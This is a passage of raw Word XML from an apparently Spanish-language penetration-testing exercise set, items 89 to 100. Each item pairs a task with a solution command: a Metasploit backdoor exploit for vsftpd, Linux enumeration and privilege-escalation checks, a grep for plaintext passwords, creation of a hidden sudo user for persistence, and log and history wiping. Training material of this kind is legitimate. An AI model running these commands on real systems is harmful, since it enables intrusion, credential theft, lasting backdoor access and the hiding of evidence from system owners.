          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5529035E" w14:textId="612EA515" w:rsidR="007123D4" w:rsidRPr="002B448B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 xml:space="preserve">89. Buscar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007123D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70D98557" wp14:editId="1DC907F9">
            <wp:extent cx="5400040" cy="2846705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="867764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6445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41C0" w14:textId="77777777" w:rsidR="007123D4" w:rsidRDefault="007123D4" w:rsidP="00206562"/>
    <w:p w14:paraId="00023A83" w14:textId="21731E11" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="708B64E4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="54A1C892">
          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA6C9A" w14:textId="77777777" w:rsid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90. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Configurar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E1F621" w14:textId="1DE0F449" w:rsidR="00E51EDA" w:rsidRPr="00206562" w:rsidRDefault="00E51EDA" w:rsidP="00206562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7B2C22B1" wp14:editId="673BE6B8">
            <wp:extent cx="4305300" cy="1495425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1243507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0724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1541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use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5222B9D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91. Enumerar usuarios en un sistema Linux comprometido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19405CFA" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Tras acceder a una máquina, obtén la lista de usuarios del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E764881" w14:textId="194E28DD" w:rsidR="00E51EDA" w:rsidRPr="00206562" w:rsidRDefault="00E51EDA" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6682635A" wp14:editId="56A37E95">
            <wp:extent cx="5400040" cy="6292215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="836791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9188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9D90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6B1886BC" w14:textId="77777777" w:rsidR="00206562" w:rsidRP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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26F5C9F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Este archivo contiene todos los usuarios del sistema. Es clave para saber posibles objetivos de escalada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50EEE7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="69FBBD6D">
          <v:rect id="_x0000_i1101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E9F14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92. Buscar archivos SUID (posible escalada de privilegios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA1712" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Busca archivos con permisos SUID en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB763FC" w14:textId="5195D4A3" w:rsidR="00E51EDA" w:rsidRPr="00206562" w:rsidRDefault="00E51EDA" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C0B444F" wp14:editId="75034766">
            <wp:extent cx="5400040" cy="7619365"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="2014926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2614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1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E50E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0B6729EC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> / -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>perm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -4000 2&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FC0026D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 xml:space="preserve">Los archivos SUID se ejecutan con permisos de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> → posible vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429D235" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="799EDC08">
          <v:rect id="_x0000_i1102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6372277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93. Ver procesos ejecutándose como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D604BB5" w14:textId="41C905BE" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t xml:space="preserve">Identifica procesos que se ejecutan como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009321FE">
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="66B75D63" w14:textId="5CD0DBD8" w:rsidR="009321FE" w:rsidRPr="00206562" w:rsidRDefault="009321FE" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="538ED338" wp14:editId="585FF878">
            <wp:extent cx="5400040" cy="5346700"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="12238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17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2BEE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12B326C0" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>aux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> | grep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DE24CB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Algunos servicios mal configurados pueden ser explotables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA5244D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5E6C0C26">
          <v:rect id="_x0000_i1103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E7D81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94. Revisar tareas programadas (cron)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB807FB" w14:textId="595871E3" w:rsidR="009321FE" w:rsidRDefault="009321FE" w:rsidP="0020656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1160947" wp14:editId="1F37B58E">
            <wp:extent cx="5400040" cy="2522855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58871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187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E2EB" w14:textId="77777777" w:rsidR="009321FE" w:rsidRPr="00206562" w:rsidRDefault="009321FE" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D1AE7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tareas programadas que puedan ser vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EFA53D" w14:textId="737128B6" w:rsidR="009321FE" w:rsidRPr="009321FE" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E512BE9" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>crontab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
      </w:r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crontab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B0E5985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 xml:space="preserve">Scripts ejecutados por </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> pueden ser modificables → escalada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108D0EEC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="721B07B6">
          <v:rect id="_x0000_i1104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8231C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95. Buscar archivos modificables por el usuario actual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC620E" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Encuentra archivos que el usuario puede modificar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA8373" w14:textId="598BB4AF" w:rsidR="009321FE" w:rsidRDefault="009321FE" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F9F7444" wp14:editId="033C349E">
            <wp:extent cx="4648200" cy="8562975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1943991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9190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5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4655" w14:textId="77777777" w:rsidR="009321FE" w:rsidRPr="00206562" w:rsidRDefault="009321FE" w:rsidP="00206562"/>
    <w:p w14:paraId="5D0A86DB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Solución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E45C3E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> / -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>writable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> 2&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EB3AAD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Permite encontrar puntos débiles para inyectar código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DACC3CF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1203BF44">
          <v:rect id="_x0000_i1105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E0924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96. Escalada básica con sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D594CFE" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t xml:space="preserve">Comprueba si puedes ejecutar comandos como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32640ADE" w14:textId="4DCC1F1D" w:rsidR="0038717D" w:rsidRPr="00206562" w:rsidRDefault="0038717D" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AD26903" wp14:editId="6FF4B0AE">
            <wp:extent cx="5400040" cy="763270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199389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940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8EE0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68D52913" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495A7ED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Si aparece algún comando permitido → posible escalada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5809C4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="34CD47C8">
          <v:rect id="_x0000_i1106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="287B4F7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97. Enumeración automática con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LinPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DA34E1C" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Ejecuta una herramienta automática de enumeración.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBAE0D3" w14:textId="09F46FEB" w:rsidR="0038717D" w:rsidRDefault="0038717D" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01764186" wp14:editId="4132B20D">
            <wp:extent cx="5400040" cy="1118235"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="710020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2016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3C24" w14:textId="77777777" w:rsidR="0038717D" w:rsidRPr="00206562" w:rsidRDefault="0038717D" w:rsidP="00206562"/>
    <w:p w14:paraId="1CF85A85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7EB56BB1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> +x linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F15B2B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Herramienta clave para detectar vulnerabilidades automáticamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16432976" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="42478059">
          <v:rect id="_x0000_i1107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A471F" w14:textId="7CA6056F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98. Buscar credenciales en archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0221AC7A" w14:textId="0508E728" w:rsidR="00F56648" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t xml:space="preserve">Busca posibles </w:t>
      </w:r>
      <w:r w:rsidR="002B448B" w:rsidRPr="00206562">
        <w:t>contraseñas en el siste</w:t>
      </w:r>
      <w:r w:rsidR="002B448B">
        <w:t>ma</w:t>
      </w:r>
      <w:r w:rsidR="002B448B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BE1A357" wp14:editId="29106AD8">
            <wp:extent cx="4724400" cy="3231636"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1783223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2348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728428" cy="323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48B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F56648">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C82AEE" wp14:editId="29B0D51A">
            <wp:extent cx="5400040" cy="5112385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="430284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8473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4B4D" w14:textId="1564C6C4" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="002B448B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Solución</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11906FB7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grep -r "password" /home 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A6F6F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Muchos sistemas almacenan credenciales en texto plano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A31D8C1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4C13B51E">
          <v:rect id="_x0000_i1108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BAC73" w14:textId="77777777" w:rsidR="002B448B" w:rsidRDefault="002B448B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55553F73" w14:textId="73A06C89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99. Crear persistencia con usuario oculto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427008BA" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Crea un usuario para mantener acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0CF44D" w14:textId="64D0DD81" w:rsidR="00F56648" w:rsidRPr="00206562" w:rsidRDefault="00F56648" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06FE55F7" wp14:editId="1A0156AB">
            <wp:extent cx="5400040" cy="1604645"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1911367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6734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9B43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B50556B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useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>aG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> sudo hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9E248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Permite volver a entrar al sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9ABA07" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2B18111F">
          <v:rect id="_x0000_i1109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF582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100. Borrar rastros (limpieza básica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134610E3" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Elimina evidencias de acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E17806D" w14:textId="3B971610" w:rsidR="00F56648" w:rsidRPr="00206562" w:rsidRDefault="00F56648" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E362C32" wp14:editId="6F4A3F78">
            <wp:extent cx="2657475" cy="1438275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1722674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7427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8ED7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b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Solución</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E79D4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history -c</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>rm -rf ~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
